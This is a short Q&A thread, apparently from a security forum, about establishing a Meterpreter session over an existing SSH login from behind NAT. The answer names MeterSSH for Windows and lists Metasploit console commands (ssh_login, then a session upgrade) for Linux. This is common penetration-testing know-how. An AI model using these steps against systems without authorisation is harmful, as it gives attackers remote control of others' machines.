# Meterpreter on ssh connection

Tags: ssh, metasploit

I'm behind NAT.

I can log in over ssh to the target.

How to use `metasploit` / Send `meterpreter` over that SSH connection?

I tried `shell_to_meterpreter` but it failed because I can't open my port for reverse TCP to connect to.

Both machines are on linux.

Answer (score 3):

**Windows:**

You can try using [MeterSSH](https://github.com/trustedsec/meterssh).

MeterSSH is an easy way to inject native shellcode into memory and pipe anything over SSH to the attacker machine through an SSH tunnel and all self contained into one single Python file.

**Linux:**

You can use the auxiliary module of metasploit called ssh_login:

```
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.0.109  
msf auxiliary(ssh_login) > set username foo   
msf auxiliary(ssh_login) > set password bar
msf auxiliary(ssh_login) > exploit
```

Now convert command shell into meterpreter shell through following command

```
session –u 1
```

Comment: I forgot to add. Both machines are on linux.